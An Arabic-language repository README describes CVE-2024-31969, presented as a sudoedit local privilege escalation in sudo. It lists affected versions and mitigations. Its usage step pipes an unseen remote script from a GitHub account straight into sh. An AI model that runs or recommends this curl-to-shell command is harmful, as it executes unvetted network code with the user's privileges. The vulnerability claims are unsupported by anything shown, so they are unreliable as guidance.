
يوفر سكربت فحص لإثبات المفهوم ووثائق لـ CVE-2024-31969، وهو تصعيد صلاحيات محلي في sudoedit الخاص بـ sudo، بما في ذلك الإصدارات المتأثرة وإرشادات التخفيف.
CVE-2024-31969 هو ثغرة تصعيد صلاحيات محلي في sudo عند استخدام أمر sudoedit.
تم تقديم هذه الثغرة منذ sudo 1.9.0 بسبب الطريقة غير الدقيقة التي يتحقق بها sudoedit من متغيرات بيئة المستخدم وملكية الملفات.
A flaw introduced in sudo 1.9.0 in how
sudoeditvalidated users' environment variables and file ownership.
تسمح هذه الثغرة لمستخدم محلي لديه صلاحية الوصول إلى sudoedit بتعديل ملفات عشوائية كصلاحية root من خلال التلاعب بمتغيرات البيئة مثل SUDO_EDITOR، أو عبر استغلال الروابط الرمزية (symlink).
| إصدار Sudo | الحالة |
|---|---|
| 1.9.0 → 1.9.15p4 | 🔥 معرّض |
| 1.9.15p5 فما فوق | ✅ آمن |
| 1.8.x (بما في ذلك 1.8.23) | ❌ غير متأثر |
قم بتشغيل الأمر التالي:
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh
sudo إلى الإصدار 1.9.15p5 أو أحدث.sudoers التي تسمح بـ sudoedit للمستخدمين غير root.env_keep أو env_reset الآمنة في ملف /etc/sudoers.تم إنشاء هذا المستودع لأغراض تعليمية وتوثيق أمن الأنظمة.
يُمنع منعًا باتًا استخدام هذه المعلومات في أنشطة غير قانونية أو دون إذن كتابي من مالك النظام.
أي شكل من أشكال إساءة الاستخدام يقع بالكامل خارج مسؤولية المنشئ.